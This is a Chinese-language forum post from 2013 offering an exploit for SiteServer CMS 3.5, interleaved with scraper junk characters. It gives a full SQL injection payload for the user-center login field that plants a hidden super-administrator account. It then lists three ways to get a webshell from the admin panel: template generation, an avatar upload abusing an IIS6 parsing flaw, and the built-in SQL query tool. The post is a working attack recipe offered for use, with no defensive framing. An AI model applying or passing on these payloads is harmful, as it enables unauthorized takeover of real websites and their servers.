经测试秒杀最新的3.5版* i7 h* X0 @7 u; g' l& q& q
stieserver官网:www.siteserver.cn* s1 l" Y# X1 r+ F
EXP:
; r3 l4 ^* Q, A- u- k w9 b/ R; s直接访问UserCenter/login.aspx7 I$ X1 F% e; V2 _9 O+ V) [
用户名处输入:6 X' P: o- b0 B* v8 z$ i: q' c
: h' g8 D( p* R123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–7 i- h1 S1 J9 i, C
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
. O2 P; {0 S- k# z: L5 }3 Q& u4 Q: \之后再访问后台SiteServer/login.aspx用插入的用户登陆7 P% G7 H; h7 j, P, `9 P
后台拿webshell的三种方法:# ~" i" `: z. L8 g. V
一、& I% f/ B1 W+ g7 K0 I% ]$ }1 x
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
0 w0 c. \ L+ o* E- A9 H2 ^3 {. c. ^二、/ F% a9 {) ]) ]: P' U. @0 H1 Z
成员权限-》添加用户-》用户名为:1.asp
0 m# t L( P/ c' i, Z9 uhttp://127.0.0.1/usercenter/
0 s4 M Z h, B' l7 t0 T用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell% s9 x3 E" i3 S6 o! v% M. `* b
(ps:后台添加用户时不会验证是否含有非法字符)
1 Q5 Z: y1 P, }4 q* n) j3 F' V三、
' ?0 Z: R5 [9 [1 V; P `: d系统工具-》实用工具-》机器参数查看
+ C, s2 P& U v1 @ f可以看到数据库类型、名称,WEB路径7 W, m' P1 t( D7 R) c6 c
系统工具-》数据库工具-》SQL语句查询! N1 K A5 G2 N
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |
发表于 2013-2-16 21:40:46
收藏
支持
反对